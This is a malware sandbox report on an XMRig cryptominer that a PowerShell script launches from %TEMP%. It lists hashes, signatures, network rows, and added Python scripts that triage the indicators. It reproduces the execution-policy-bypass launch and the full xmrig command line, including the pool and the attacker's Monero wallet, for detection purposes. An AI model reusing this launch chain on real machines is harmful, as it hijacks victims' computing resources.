| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/388-0-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp
memory/388-1-0x00000258FCEE0000-0x00000258FCF02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gxx1sy0n.jrn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/388-10-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/388-11-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/388-13-0x00000258FCFA0000-0x00000258FCFB2000-memory.dmp
memory/388-14-0x00000258FCF90000-0x00000258FCF9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/904-45-0x000002419AEC0000-0x000002419AEE0000-memory.dmp
memory/904-46-0x000002419AF10000-0x000002419AF30000-memory.dmp
memory/904-47-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/388-48-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp
memory/904-50-0x000002422F3B0000-0x000002422F3D0000-memory.dmp
memory/904-49-0x000002422F390000-0x000002422F3B0000-memory.dmp
memory/904-51-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/388-52-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp
memory/904-53-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-54-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-55-0x000002422F390000-0x000002422F3B0000-memory.dmp
memory/904-56-0x000002422F3B0000-0x000002422F3D0000-memory.dmp
memory/904-57-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-58-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-59-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-60-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-61-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-62-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-63-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-64-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-65-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-66-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-67-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-68-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-69-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-70-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-71-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-72-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-73-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-74-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-75-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-76-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-77-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-78-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-79-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-80-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-81-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-82-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-83-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-84-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-85-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-86-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-87-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-88-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-89-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-90-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-91-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-92-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-93-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-94-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-95-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-96-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-97-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-98-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-99-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-100-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-101-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-102-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-103-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-104-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-105-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-106-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-107-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-108-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-109-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-110-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-111-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-112-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-113-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-114-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
memory/904-115-0x00007FF6AE750000-0x00007FF6AF383000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:16
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3588 wrote to memory of 920 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3588 wrote to memory of 920 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
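The two command lines above are the whole story of this sample: PowerShell runs a script out of %TEMP% with the execution policy bypassed, and that script starts xmrig with `-a rx` (RandomX, the Monero proof of work), a `stratum+ssl` pool on TCP 443 and a Monero address in the `-u` field. The signature hits fit that picture: `SeLockMemoryPrivilege` on xmrig.exe is consistent with xmrig enabling large pages for the RandomX dataset, and "PID 3588 wrote to memory of 920" is the parent PowerShell process writing into the child it just created, not injection into an unrelated process. The following is an added triage helper, not part of the sandbox output or of the xmrig project. It parses both command lines (copied from the report; behavioral22 and behavioral31 show the same pair), pulls out pool, algorithm, coin, wallet and worker, and applies a few rules whose names, option table and verdict logic are this example's own assumptions. The `COIN:wallet.worker` layout of the `-u` value is the unmineable.com convention seen here; a plain xmrig user string is just `wallet[.worker]`.

```python
"""Triage of the parent/child command lines listed under Processes.

Added example, not sandbox output. The two command lines are copied from the
report; the rule names, the option table and the verdict logic are this
example's own assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Copied from the report (behavioral23; behavioral22 and behavioral31 show the same pair).
PARENT_CMDLINE = (
    r'powershell.exe -ExecutionPolicy bypass -File '
    r'"C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"'
)
CHILD_CMDLINE = (
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx '
    r'-o stratum+ssl://rx.unmineable.com:443 '
    r'-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF'
    r'.unmineable_worker_vilqtiac -p x'
)

_TOKEN = re.compile(r'"([^"]*)"|(\S+)')
# xmrig switches that take a value, and bare flags (a subset of `xmrig --help`).
_VALUE_OPTS = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
               "-u": "user", "--user": "user", "-p": "pass", "--pass": "pass",
               "-t": "threads", "--threads": "threads", "--donate-level": "donate-level"}
_FLAG_OPTS = {"-k": "keepalive", "--keepalive": "keepalive", "-B": "background",
              "--background": "background", "--tls": "tls"}
# Monero standard (4...) or subaddress (8...): 95 base58 characters.
_XMR_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


def split_cmdline(cmdline: str) -> list[str]:
    """Windows-style split: a double-quoted run is one argument, quotes removed."""
    return [quoted or bare for quoted, bare in _TOKEN.findall(cmdline)]


def parse_xmrig_args(argv: list[str]) -> dict[str, str | bool]:
    """Map the recognised xmrig switches to their values; argv[0] is the binary."""
    opts: dict[str, str | bool] = {}
    i = 1
    while i < len(argv):
        tok = argv[i]
        name, has_eq, inline_val = tok.partition("=")
        if has_eq and name in _VALUE_OPTS:
            opts[_VALUE_OPTS[name]] = inline_val
        elif tok in _VALUE_OPTS and i + 1 < len(argv):
            opts[_VALUE_OPTS[tok]] = argv[i + 1]
            i += 1
        elif tok in _FLAG_OPTS:
            opts[_FLAG_OPTS[tok]] = True
        i += 1
    return opts


def parse_pool_user(user: str) -> tuple[str | None, str, str | None]:
    """Split -u into (coin, wallet, worker). 'COIN:wallet.worker' is the
    unmineable.com convention; plain xmrig users are 'wallet[.worker]'."""
    coin = None
    if ":" in user.split(".", 1)[0]:
        coin, _, user = user.partition(":")
    wallet, _, worker = user.partition(".")
    return coin, wallet, worker or None


@dataclass
class Finding:
    rule: str
    detail: str


@dataclass
class Triage:
    algo: str | None = None
    pool_scheme: str | None = None
    pool_host: str | None = None
    pool_port: int | None = None
    coin: str | None = None
    wallet: str | None = None
    worker: str | None = None
    findings: list[Finding] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        rules = {f.rule for f in self.findings}
        if "stratum_pool_url" in rules or {"miner_algo_randomx", "monero_wallet_in_cmdline"} <= rules:
            return "cryptominer"
        return "suspicious" if rules else "clean"


def triage(parent_cmdline: str, child_cmdline: str) -> Triage:
    t = Triage()
    parent = split_cmdline(parent_cmdline)
    lowered = [a.lower() for a in parent]
    # Parent: execution policy bypassed, script run out of %TEMP%.
    if "-executionpolicy" in lowered and "bypass" in lowered:
        t.findings.append(Finding("ps_execpolicy_bypass", parent_cmdline))
    if "-file" in lowered:
        idx = lowered.index("-file") + 1
        script = parent[idx] if idx < len(parent) else ""
        if "\\appdata\\local\\temp\\" in script.lower():
            t.findings.append(Finding("ps_script_from_temp", script))
    # Child: -a rx is RandomX, stratum+ssl is the pool protocol, -u carries the wallet.
    opts = parse_xmrig_args(split_cmdline(child_cmdline))
    algo, url, user = opts.get("algo"), opts.get("url"), opts.get("user")
    if isinstance(algo, str):
        t.algo = algo
        if algo.startswith("rx"):
            t.findings.append(Finding("miner_algo_randomx", algo))
    if isinstance(url, str):
        parts = urlsplit(url)
        t.pool_scheme, t.pool_host, t.pool_port = parts.scheme, parts.hostname, parts.port
        if parts.scheme.startswith("stratum"):
            t.findings.append(Finding("stratum_pool_url", url))
    if isinstance(user, str):
        t.coin, t.wallet, t.worker = parse_pool_user(user)
        if _XMR_ADDR.match(t.wallet):
            t.findings.append(Finding("monero_wallet_in_cmdline", t.wallet))
    return t


if __name__ == "__main__":
    result = triage(PARENT_CMDLINE, CHILD_CMDLINE)
    print(result.verdict, result.pool_host, result.pool_port, result.coin, result.worker)
    for f in result.findings:
        print(f"  {f.rule}: {f.detail[:70]}")
```

The wallet and worker name are the most durable indicators here: the pool host and the dropped path can change between campaigns, but payouts go to the same address, so it is worth pivoting on `45aHvZ4X…KxdF` across other reports before blocking only `rx.unmineable.com`.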
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.117.168.52.in-addr.arpa | udp |
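Most of the Network table is noise rather than indicators: the `*.in-addr.arpa` rows are the sandbox reverse-resolving the addresses it just talked to, and the `bing.com` rows are background Windows traffic. What is left is a download from GitHub (consistent with the `xmrig-6.21.3` release directory that appears under Files) and the pool connection to `rx.unmineable.com` on 161.35.34.195:443. Because the pool runs TLS on 443, port-based egress filtering will not catch it; the DNS name and the IP are the usable indicators, while the GitHub hosts are shared infrastructure that should not be blocked wholesale. The script below is an added example, not part of the sandbox output: it takes the rows copied from this table, sorts them into categories (the category names, the host lists and the noise suffix list are this example's assumptions) and matches each PTR query back to the IPs in the TCP rows so the reader can see which reverse lookups belong to the miner's own traffic.

```python
"""Sort the Network rows of this report into IOCs and sandbox noise.

Added example, not sandbox output. The rows are copied from the behavioral23
Network table; the category names, host lists and noise suffixes are this
example's assumptions.
"""
from __future__ import annotations

from collections import Counter

# (country, destination, domain, proto), copied from the report.
NETWORK_ROWS = [
    ("US", "8.8.8.8:53", "github.com", "udp"),
    ("GB", "20.26.156.215:443", "github.com", "tcp"),
    ("US", "8.8.8.8:53", "228.249.119.40.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "objects.githubusercontent.com", "udp"),
    ("US", "185.199.108.133:443", "objects.githubusercontent.com", "tcp"),
    ("US", "8.8.8.8:53", "215.156.26.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "144.107.17.2.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "133.108.199.185.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "g.bing.com", "udp"),
    ("US", "204.79.197.237:443", "g.bing.com", "tcp"),
    ("NL", "23.62.61.97:443", "www.bing.com", "tcp"),
    ("US", "8.8.8.8:53", "136.32.126.40.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "196.249.167.52.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "237.197.79.204.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "97.61.62.23.in-addr.arpa", "udp"),
    ("NL", "23.62.61.97:443", "www.bing.com", "tcp"),
    ("US", "8.8.8.8:53", "205.47.74.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "rx.unmineable.com", "udp"),
    ("GB", "161.35.34.195:443", "rx.unmineable.com", "tcp"),
    ("US", "8.8.8.8:53", "195.34.35.161.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "217.106.137.52.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "86.23.85.13.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "56.126.166.20.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "14.227.111.52.in-addr.arpa", "udp"),
    ("US", "8.8.8.8:53", "169.117.168.52.in-addr.arpa", "udp"),
]

MINING_POOL_HOSTS = {"rx.unmineable.com"}  # the -o host from the xmrig command line
PAYLOAD_HOSTS = {"github.com", "objects.githubusercontent.com"}  # assumption: xmrig-6.21.3 fetched from a release
OS_NOISE_SUFFIXES = (".bing.com",)  # assumption: Windows background traffic in the sandbox
IOC_CATEGORIES = {"mining_pool", "payload_download"}
PTR_SUFFIX = ".in-addr.arpa"


def classify(domain: str) -> str:
    d = domain.lower()
    if d in MINING_POOL_HOSTS:
        return "mining_pool"
    if d in PAYLOAD_HOSTS:
        return "payload_download"
    if d.endswith(PTR_SUFFIX):
        return "ptr_lookup"
    if d.endswith(OS_NOISE_SUFFIXES):
        return "os_background"
    return "unknown"


def reverse_ptr_ip(name: str) -> str:
    """'195.34.35.161.in-addr.arpa' -> '161.35.34.195'."""
    labels = name.lower()[: -len(PTR_SUFFIX)].split(".")
    return ".".join(reversed(labels))


def summarize(rows):
    """Return the IOCs (TCP connections to pool/payload hosts) and per-category counts.
    A PTR query is 'correlated' when the address it reverses appears in a TCP row."""
    tcp_ips = {dest.rsplit(":", 1)[0] for _, dest, _, proto in rows if proto == "tcp"}
    counts: Counter[str] = Counter()
    iocs = []
    for country, dest, domain, proto in rows:
        cat = classify(domain)
        if cat == "ptr_lookup":
            counts["ptr_correlated" if reverse_ptr_ip(domain) in tcp_ips else "ptr_uncorrelated"] += 1
            continue
        counts[cat] += 1
        if proto == "tcp" and cat in IOC_CATEGORIES:
            iocs.append({"domain": domain, "dest": dest, "country": country, "category": cat})
    return {"iocs": iocs, "counts": dict(counts)}


if __name__ == "__main__":
    s = summarize(NETWORK_ROWS)
    for ioc in s["iocs"]:
        print(f'{ioc["category"]:17} {ioc["domain"]:32} {ioc["dest"]}')
    print(s["counts"])
```

Ten of the fifteen PTR queries reverse to addresses that never appear as a TCP destination in this table, so they are not evidence of additional miner traffic; only the five that map back to the GitHub, Bing and pool connections are worth reading, and of those only the pool one is an indicator.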
Files
memory/3588-0-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/3588-6-0x000001D868E90000-0x000001D868EB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jsy3faf3.1gj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3588-11-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-12-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-14-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-15-0x000001D869000000-0x000001D869012000-memory.dmp
memory/3588-16-0x000001D868E60000-0x000001D868E6A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/920-47-0x0000025011C30000-0x0000025011C50000-memory.dmp
memory/920-48-0x0000025011D90000-0x0000025011DB0000-memory.dmp
memory/920-49-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-50-0x0000025011DB0000-0x0000025011DD0000-memory.dmp
memory/920-52-0x0000025011DD0000-0x0000025011DF0000-memory.dmp
memory/3588-51-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/3588-54-0x00007FF9D6763000-0x00007FF9D6765000-memory.dmp
memory/920-53-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/3588-55-0x00007FF9D6760000-0x00007FF9D7221000-memory.dmp
memory/920-56-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-58-0x0000025011DB0000-0x0000025011DD0000-memory.dmp
memory/920-57-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-59-0x0000025011DD0000-0x0000025011DF0000-memory.dmp
memory/920-60-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-61-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-62-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-63-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-64-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-65-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-66-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-67-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-68-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-69-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-70-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-71-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-72-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-73-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-74-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-75-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-76-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-77-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-78-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-79-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-80-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-81-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-82-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-83-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-84-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-85-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-86-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-87-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-88-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-89-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-90-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-91-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-92-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-93-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-94-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-95-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-96-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-97-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-98-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-99-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-100-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-101-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-102-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-103-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-104-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-105-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-106-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-107-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-108-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-109-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-110-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-111-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-112-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-113-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-114-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-115-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-116-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-117-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
memory/920-118-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:16
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
